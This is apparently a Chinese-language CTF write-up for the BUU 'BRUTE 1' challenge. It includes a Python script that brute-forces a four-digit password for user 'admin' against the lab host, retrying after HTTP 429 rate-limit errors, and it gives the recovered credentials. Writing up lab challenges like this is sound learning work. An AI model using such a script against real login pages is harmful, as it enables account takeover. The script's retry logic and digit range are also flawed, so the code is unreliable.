3、BUU BRUTE 1
这道题打开靶机后,我以为是关于SQL注入的内容,但是发现怎么都不成功。后面查看网络上的解题思路,主要有两种,一种是是用Burp suite暴力破解,一种是使用python脚本,不过两种对于用户名都是先进行了猜测后,发现靶机有明显的错误提示信息“密码错误,为四位数字。”,尔后对于密码的四位数字进行了破解。
我开始登录时就采用了常见的用户名 admin 进行测试,发展报了上面的密码错误信息。在只用Burp suite工具进行数字破解时,发现速度很慢,最终没有耐心等下去。 后续根据网上提供的python脚本进行测试,短时间内成果获取密码。
代码如下:
import time
import requests
#if __name__ == 'main_':
for i in range(1000,9999):
print("破解到:" + str(i))
ret = requests.get("http://8839c9b9-6d14-41d6-81c0-fb60072a0b13.node4.buuoj.cn:81/?username=admin&password=" + str(i))
if 429 == ret.status_code:
time.sleep(0.5)
i = i-1
continue
if ret.text != "密码错误,为四位数字。" :
print(ret)
print("密码为:" + str(i))
break
其中四位数字的取值范围可以在运行过程中分段该变。
429是因为在运行过程中会有429的错误码,导致没有得到正确的密码脚本就停止了,后面参考网上遇到429错误码让继续就可以了。
最终得到结果如下:
输入用户名/密码 admin/6490即可得到flag。